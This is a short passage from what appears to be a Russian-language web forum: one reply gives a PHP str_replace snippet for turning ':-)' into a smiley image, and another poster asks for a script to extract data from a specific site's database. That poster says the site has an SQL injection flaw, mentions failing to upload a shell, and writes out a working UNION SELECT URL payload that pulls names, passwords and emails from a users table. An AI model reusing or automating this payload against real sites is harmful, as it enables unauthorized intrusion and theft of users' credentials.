Чё ты паришься?
$kf = str_replace(':-)','<img src="http://полный_путь.ru/smiles/1.gif" alt="smile">', $kf);
И вообще может быть у тебя там стоит htmlspeciachars или что-то типо этого.
Люди добрые помоги пожалуйста! Столкунлся с токой проблемой хочу написать скрипт для извлечения данных из БД. Подскажите где можно найти что то подобное?
Мне нужно под обределенный сайт а там только с локал хоста можно залогинится, есть уязвимость SQL Инъекция. шелл не залить. пробовал вручную вот так http://site.site/index.php?id=-3+union+select+concat_ws(0x3a,name,pass,email),2+f rom+users+limit+0,1/* но приходится постоянно менять параметр, короче гемор получается